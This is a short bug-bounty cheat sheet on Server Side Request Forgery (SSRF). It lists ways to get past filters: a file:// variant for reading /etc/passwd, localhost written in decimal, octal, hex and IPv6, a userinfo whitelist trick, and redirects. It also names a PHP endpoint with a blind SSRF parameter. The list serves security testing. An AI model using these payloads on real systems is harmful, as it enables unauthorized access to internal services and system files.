Server Side Request Forgery (SSRF)

file:///etc/passwd : Not authorized file://\/\/etc/passwd : Work #BugBounty
http://127.1/
http://0000::1:80/
http://[::]:80/
http://2130706433/
http://whitelisted@127.0.0.1
http://0x7f000001/
http://017700000001
http://0177.00.00.01
Also using a redirect to localhost will often work.




add this one to your wordlist : /_includes/framer.php juicy blind ssrf via `base` param #bugbountytips #bugbountytip
Last updated